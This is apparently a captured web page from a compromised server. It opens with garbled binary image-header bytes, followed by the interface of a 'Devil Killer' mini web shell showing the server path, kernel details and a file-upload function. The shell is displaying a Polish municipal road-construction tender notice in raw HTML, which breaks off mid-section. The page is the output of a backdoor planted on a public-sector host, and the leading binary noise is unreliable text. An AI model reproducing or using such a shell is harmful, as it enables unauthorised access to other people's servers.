JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231227/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231227/0057330101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej oraz powiatowej nr 1205F w miejscowości Pałck </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Skąpe</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970770505</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Skąpe 65</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Skąpe</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-213</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@skape.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.skape.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej oraz powiatowej nr 1205F w miejscowości Pałck </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6774fadc-9d78-11ee-953e-c2ea26915e21</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00573301</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6774fadc-9d78-11ee-953e-c2ea26915e21 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e – Zamówienia , oraz poczty elektronicznej, które dostępne są pod adresami:<br/>-https://ezamowienia.gov.pl/pl/<br/>-przetargi@skape.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu o<br/>udzielenie zamówienia publicznego (złożenie oferty wraz załącznikami), musi posiadać konto Wykonawcy na portalu e -<br/>Zamówienia. Zamawiający określa następujące wymagania sprzętowo - aplikacyjne pozwalające na korzystanie z Platformy: stały<br/>dostęp do sieci Internet; komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux, zainstalowana<br/>dowolna przeglądarka internetowa , włączona obsługa JavaScript oraz Cookies. Do złożenia oferty konieczne jest posiadanie przez<br/>osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub<br/>podpisu osobistego. Szczegółowe informacje zawarte są w rozdziale V SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) informujemy,<br/>że:<br/>a) Administratorem danych osobowych jest Gmina Skąpe, Skąpe 65, 66-213 Skąpe, urzad@skape.pl, tel. 683419212.<br/>b) we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem<br/>danych można się kontaktować z Inspektorem Ochrony Danych u Administratora listownie na adres Administratora, na adres e-mail:<br/>iod@skape.pl lub tel. 683419213.<br/>c) Pani/Pana dane osobowe przetwarzane będą w celu prowadzenia postępowania o udzielenie zamówienia publicznego i zawarcia<br/>umowy;<br/>d) Podstawą prawną przetwarzania Pani/Pana danych osobowych są:<br/>- art. 6 ust. 1 lit. c) RODO przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze<br/>wynikającego z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (zwaną dalej PZP);<br/>- art. 6 ust. 1 lit. b) RODO przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do<br/>podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy;<br/>e) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o jawność postępowania na podstawie art. 18, art. 74 PZP,<br/>f) Pani/Pana dane osobowe nie są przekazywane do państwa trzeciego lub organizacji międzynarodowej;<br/>g) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>okresy wskazane powyżej mogą zostać przedłużone do czasu, upływu okresu przedawnienia ewentualnych roszczeń, jeśli<br/>przetwarzanie danych osobowych będzie niezbędne do dochodzenia lub obrony przed takimi roszczeniami; po upływie wskazanych<br/>powyżej terminów dokumenty zostaną zarchiwizowane zgodnie z przepisami prawa obowiązującymi w tym zakresie.<br/>h) Informujemy, iż przysługują Pani/Panu następujące prawa:<br/>- prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych przy czym skorzystanie z prawa do sprostowania lub<br/>uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>- prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w<br/>art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, a<br/>także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>i) przysługuje Pani/Panu prawo do wniesienia skargi do organu nadzorczego (tj.: Prezesa Urzędu Ochrony Danych Osobowych ul.<br/>Stawki 2, 00-193 Warszawa) jeżeli uważa Pani/Pan, że przetwarzanie danych osobowych narusza przepisy prawa;<br/>j) podanie danych osobowych jest wymogiem wynikającym z ustawy PZP, a w przypadku, złożenia oferty najkorzystniejszej także<br/>warunkiem zawarcia umowy o udzielenie zamówienia publicznego; niepodanie danych może skutkować wadliwością złożonej oferty i<br/>jej odrzuceniem;<br/>k) w trakcie przetwarzania danych żadne decyzje nie będą podejmowane w sposób zautomatyzowany oraz nie będą budowane<br/>żadne profile.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.19.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania pn. „Przebudowa drogi gminnej oraz powiatowej nr 1205F wraz z wykonaniem odwodnienia w m. Pałck” w ramach projektu pt. „Przebudowa drogi gminnej oraz powiatowej nr 1205F w m. Pałck”. Zadanie zostanie współfinansowane ze środków z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych, zwanym dalej „Polski Ład”.<br/>2.	Prace budowlane do wykonania w ramach ww. zadania będą prowadzone w m. Pałck na <br/>dz. ewid. nr: <br/>1)	334, 341/1, 87– stanowiące własność Gminy Skąpe,<br/>2)	336,341/2–będące własnością Zarządu Powiatu Świebodzińskiego i przyjętych do realizacji przez Gminę Skąpe Porozumieniem nr DG.032.11.2023 Zarządu Powiatu Świebodzińskiego z dnia 8 lipca 2023r.<br/>3.	W ramach ww. projektu Wykonawca zobowiązuje się w szczególności wykonać poniższe roboty budowlane: <br/>1)	roboty przygotowawcze – pomiarowe, usunięcie humusu, <br/>2)	roboty ziemne – korytowanie, profilowanie i zagęszczenie podłoża, <br/>3)	odwodnienie drogi, <br/>4)	ustawienie obrzeży chodnikowych, krawężników, <br/>5)	podbudowy pod nawierzchnię jezdni, zjazdów i chodników, <br/>6)	nawierzchnie z betonu asfaltowego, <br/>7)	roboty wykończeniowe.<br/>4.	Wszystkie materiały zastosowane przy inwestycji przez Wykonawcę muszą posiadać atesty i być dopuszczone do stosowania w budownictwie. Wszystkie warstwy konstrukcyjne nawierzchni należy wykonywać zgodnie z dokumentacją projektową, o której mowa w ust. 8 poniżej.<br/>5.	Zakres powierzony do wykonania Wykonawcy będzie obejmował wszystkie prace niezbędne <br/>do należytego wykonania przedmiotu zamówienia, zgodnie z posiadaną przez Zamawiającego dokumentacją projektową, o której mowa w ust. 8 poniżej, jak również z punktu widzenia celu, który ma osiągnąć Zamawiający w postaci przebudowy drogi gminnej i powiatowej nr 1205F wraz <br/>z wykonaniem odwodnienia w miejscowości Pałck oraz zgodnie z niniejszą umową z Wykonawcą.<br/>6.	Szczegółowy zakres prac do wykonania opisany został w SWZ, dokumentacji projektowej, Szczegółowej Specyfikacji Technicznej oraz przedmiarze robót -załącznik nr 2 do umowy.<br/>7.	W zakresie obowiązków Wykonawcy będzie m. in. wykonanie wskazanych elementów robót <br/>w dokumentacji, a także tych, które wynikną z oceny warunków terenowych, wykonanie geodezyjnej dokumentacji powykonawczej, jak również przestrzeganie zapisów decyzji, uzgodnień, warunków, zatwierdzeń, ustaleń itp., uzyskanych przez Zamawiającego w celu zrealizowania przedmiotu zamówienia. <br/>8.	Roboty budowlane zostaną wykonane zgodnie z dokumentacją projektową, opracowaną przez IDEO Joanna Szarłowicz, ul. Moniuszki 18a/39, 65-409 Zielona Góra oraz uzyskaną decyzją pozwolenia na budowę nr 344/2023 z dnia 22.12.2023 r. wydaną przez Starostwo Powiatowe w Świebodzinie. <br/>9.	Wykonawca zrealizuje roboty z materiałów, elementów wyposażenia i urządzeń własnych, które zakupi i dostarczy na teren budowy na własny koszt i ryzyko. Koszt wszelkich materiałów, elementów wyposażenia i urządzeń, których dostarczenie obciąża Wykonawcę, wykorzystanych do realizacji przedmiotu umowy, opisanego powyżej, uwzględniony jest w wynagrodzeniu Wykonawcy, o którym mowa w § 7 umowy. <br/>10.	Wykonawca oświadcza, że zapoznał się z przedmiotem zadania i dokumentacją projektową, rozpoznał zakres robót konieczny do wykonania w ramach przedsięwzięcia, który wycenił w swojej ofercie. Wykonawca nadto oświadcza, że roboty objęte umową należą do zakresu jego działalności <br/>i profesjonalnie zajmuje się wykonaniem takich robót.<br/>11.	Zamawiający zastrzega sobie prawo uzgadniania propozycji rozwiązań materiałowych oraz parametrów planowanych do zamontowania urządzeń. Użycie przez Wykonawcę materiałów <br/>i urządzeń wskazanych przez Zamawiającego nie zwalnia Wykonawcy z odpowiedzialności, jeżeli nie uprzedził Zamawiającego o ryzyku związanym z użyciem określonych materiałów i urządzeń. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45232400-6 - Roboty budowlane w zakresie kanałów ściekowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">300 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z dokumentami zamówienia (SWZ)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wymóg posiadania zdolności technicznej lub zawodowej.<br/>a) wiedza i doświadczenie:<br/>Warunek spełni Wykonawca, który wykaże, że: w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie, remoncie lub modernizacji drogi o nawierzchni bitumicznej o powierzchni co najmniej 3 500 m2. <br/><br/>b) osoby zdolne do wykonania zamówienia:<br/>Warunek spełni Wykonawca, który wykaże dysponuje lub będzie dysponował i skieruje do realizacji zamówienia co najmniej:<br/>•	1 osobę w charakterze kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im równoważne uprawnienia budowlane do kierowania robotami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji zamówienia, z co najmniej 5-letnim doświadczeniem zawodowym.<br/>•	1 osobę w charakterze kierownika robót posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji zamówienia, z co najmniej 5-letnim doświadczeniem zawodowym; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, powierzchni, daty, miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty (zgodnie z załącznikiem nr 3 do SWZ),<br/>2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (zgodnie z załącznikami nr 4, 5 do SWZ),</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Załącznik nr 2 do SWZ - Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu.<br/>2. Pełnomocnictwo (jeśli dotyczy).<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (jeśli dotyczy).<br/>4. Dokument wadium, w przypadku wniesienia wadium w formie gwarancji lub poręczenia.<br/>5. Załącznik nr 5 do SWZ - Zobowiązanie podmiotu udostępniającego zasoby (jeśli dotyczy).<br/>6. Załącznik nr 14 do SWZ - Kosztorys ofertowy - branża drogowa.<br/>7. Załącznik nr 15 do SWZ - Kosztorys ofertowy - branża sanitarna. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Przystępując do niniejszego postępowania, każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 40.000 PLN (słownie: czterdzieści tysięcy złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wymogi dotyczące wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo należy dołączyć do oferty.<br/>3) Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4) Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia powinien złożyć do oferty Oświadczenie o<br/>niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (załącznik nr 2).<br/>5) W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp , Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia składają oświadczenie, z którego wynika, usługi wykonają poszczególni wykonawcy.<br/>6) Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający żąda przed<br/>zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Wynagrodzenie Wykonawcy wypłacane będzie poprzez:<br/>1) udzielenie Wykonawcy zaliczki przez Zamawiającego, na podstawie faktury zaliczkowej wystawionej przez Wykonawcę,<br/>2) wystawienie faktur częściowych lub faktury jednorazowej końcowej, według wyboru Wykonawcy z zastrzeżeniem, że:<br/>2.1. wystawienie faktur częściowych wystawianych po wykonaniu części przedmiotu umowy<br/>i każdorazowo po dokonaniu odbioru częściowego, z zastrzeżeniem następujących rozwiązań 